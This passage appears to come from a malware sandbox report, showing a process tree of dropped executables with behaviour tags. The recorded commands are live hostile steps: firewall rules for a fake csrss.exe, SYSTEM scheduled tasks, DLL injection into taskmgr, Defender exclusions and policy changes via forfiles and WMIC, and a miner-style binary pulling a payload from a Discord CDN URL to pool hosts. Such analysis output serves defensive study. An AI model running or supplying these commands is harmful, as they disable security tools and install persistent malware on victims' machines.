- - C:\Users\Admin\Pictures\XTz0VIeuIV1rlz8hoaYk7Ojd.exe
    "C:\Users\Admin\Pictures\XTz0VIeuIV1rlz8hoaYk7Ojd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\u3wc.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u3wc.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\u3wc.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u3wc.1.exe"
      4⤵
      Blocklisted process makes network request
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5140
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6128
- - C:\Users\Admin\Pictures\KILAV28QqdA8TFWpDnxeBfib.exe
    "C:\Users\Admin\Pictures\KILAV28QqdA8TFWpDnxeBfib.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4224
  - - C:\Users\Admin\Pictures\KILAV28QqdA8TFWpDnxeBfib.exe
      "C:\Users\Admin\Pictures\KILAV28QqdA8TFWpDnxeBfib.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious use of WriteProcessMemory
      PID:5368
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1876
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4588
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5920
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:708
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4428
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5828
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5972
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:5608
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5740
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:3228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:596
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        Executes dropped EXE
        
        PID:3752
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1680
      - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        6⤵
        Executes dropped EXE
        
        PID:3516
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5664
      - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        6⤵
        Executes dropped EXE
        
        PID:5236
- - C:\Users\Admin\Pictures\JRpWeu51EJ6KH6Z1tFk6l5IW.exe
    "C:\Users\Admin\Pictures\JRpWeu51EJ6KH6Z1tFk6l5IW.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4548
  - - C:\Users\Admin\Pictures\JRpWeu51EJ6KH6Z1tFk6l5IW.exe
      "C:\Users\Admin\Pictures\JRpWeu51EJ6KH6Z1tFk6l5IW.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5520
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5804
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3112
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3248
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5856
- - C:\Users\Admin\Pictures\5vIOb5zhVQZLutv70Z4zhxHI.exe
    "C:\Users\Admin\Pictures\5vIOb5zhVQZLutv70Z4zhxHI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1952
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2148
  - - C:\Users\Admin\Pictures\5vIOb5zhVQZLutv70Z4zhxHI.exe
      "C:\Users\Admin\Pictures\5vIOb5zhVQZLutv70Z4zhxHI.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5464
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5408
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5128
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
- - C:\Users\Admin\Pictures\mrWPwq1DxmIkQjCy6MM3QmVj.exe
    "C:\Users\Admin\Pictures\mrWPwq1DxmIkQjCy6MM3QmVj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4832
  - - C:\Users\Admin\Pictures\mrWPwq1DxmIkQjCy6MM3QmVj.exe
      "C:\Users\Admin\Pictures\mrWPwq1DxmIkQjCy6MM3QmVj.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:5656
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5748
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6128
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4724
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
- - C:\Users\Admin\Pictures\1PuMPEzZvab5azK7IQYu0T4l.exe
    "C:\Users\Admin\Pictures\1PuMPEzZvab5azK7IQYu0T4l.exe"
    3⤵
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2120
- - C:\Users\Admin\Pictures\fGxiDSgCK5ZMR2r1HvJRYj2m.exe
    "C:\Users\Admin\Pictures\fGxiDSgCK5ZMR2r1HvJRYj2m.exe"
    3⤵
    - Executes dropped EXE
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:5296
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:5228
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:3912
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:4212
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:3004
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:224
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:5996
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:580
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5240
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2992
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:4484
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:5592
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5844
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6D0D.tmp\Install.exe\" it /iKSdidMBQJ 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1464
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:4440
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:1652
- - C:\Users\Admin\Pictures\QHoyiZsDHaITbf2s6lih98yW.exe
    "C:\Users\Admin\Pictures\QHoyiZsDHaITbf2s6lih98yW.exe"
    3⤵
    - Executes dropped EXE
    PID:6116
  - - C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:2736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:3768
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:6036
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:4952
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:5944
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:4588
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:5744
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:4700
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5708
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:5516
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1648
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:3980
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:5888
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5464
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\schtasks.exe
        
